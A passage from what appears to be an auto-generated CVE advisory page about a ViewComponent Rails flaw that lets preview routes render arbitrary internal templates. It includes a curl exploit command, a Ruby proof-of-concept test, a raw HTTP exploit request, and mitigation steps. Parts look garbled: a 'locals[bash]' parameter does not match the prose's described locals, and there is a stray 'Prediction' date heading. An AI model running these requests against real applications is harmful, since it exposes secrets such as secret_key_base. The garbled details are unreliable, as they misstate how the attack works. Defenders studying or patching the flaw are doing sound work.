ViewComponent, Insecure Method Dispatch leads to Arbitrary Template Rendering, CVE-2022-24762 (High)

=y</code>. The system resolves `my_component` to a valid preview class, then calls `render_with_template` with user-supplied arguments. The preview view (<code>preview.html.erb</code>) renders the specified template using <code><%= render template: @render_args[:template], locals: @render_args[:locals] || {} %></code>. This grants the attacker the ability to render any internal Rails template that is not normally routable, including those containing secrets, configuration data, or administrative partials. The attack bypasses the UI's allowed methods list because `render_args` does not enforce that list before dispatching. The vulnerability is classified as High when preview routes are externally reachable (common in development or misconfigured staging). The fix restricts `render_args` to only dispatch methods present in <code>examples</code>, rejecting calls like `render_with_template` unless explicitly defined as a preview example.

<h2 style="color: blue;">dailycve form:</h2>

Platform: ViewComponent Rails
Version: <2.49.0
Vulnerability: Unvalidated public_send call
Severity: High
date: 2022-03-28
<h2 style="color: blue;">Prediction: March 29 2022</h2>

<h2 style="color: blue;">What Undercode Say:</h2>

[bash]
Check installed view_component version
bundle show view_component || gem list view_component
Simulate exploit with curl (targeting a Rails app with previews enabled)
curl -v 'http://localhost:3000/rails/view_components/my_component/render_with_template?template=internal/secret&locals[bash]=injected'
Standalone PoC test (Ruby) - from the advisory
cat > test_poc.rb << 'EOF'
require "test_helper"
class SecurityPreviewTemplatePocTest < ActionDispatch::IntegrationTest
def test_preview_route_renders_internal_template
get "/rails/view_components/my_component/render_with_template",
params: { template: "internal/secret", locals: { poc: "x" } }
assert_response :success
end
end
EOF
Run the PoC test
bundle exec ruby -Itest test_poc.rb

Exploit:

GET /rails/view_components/any_preview/render_with_template?template=internal%2Fsecret&locals[bash]=controlled HTTP/1.1
Host: vulnerable-app.com

The request invokes `render_with_template` on the preview instance, passing `template: "internal/secret"` and locals: { malicious: "controlled" }. The preview view then renders the non‑routable `internal/secret` template with attacker‑controlled locals, potentially exposing `Rails.application.secret_key_base` or other sensitive data.

Protection from this CVE

• Upgrade to `view_component` version 2.49.0 or later.
• If upgrade is not possible, manually patch `lib/view_component/preview.rb` by adding a method allowlist: `raise AbstractController::ActionNotFound unless examples.include?(example.to_s)` inside render_args.
• Disable preview routes in production by setting `config.view_component.show_previews = false` (defaults to `false` in production for Rails >= 6.0).
• Restrict network access to `/rails/view_components/` endpoints (e.g., via firewall or basic authentication).

Impact

Exposure of arbitrary internal Rails templates, leading to leakage of application secrets (e.g., secret_key_base), configuration data, debug information, admin‑only partials, session details, and request parameters. In worst‑case scenarios, combined with template rendering quirks, this could enable limited information disclosure or further attack chaining.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin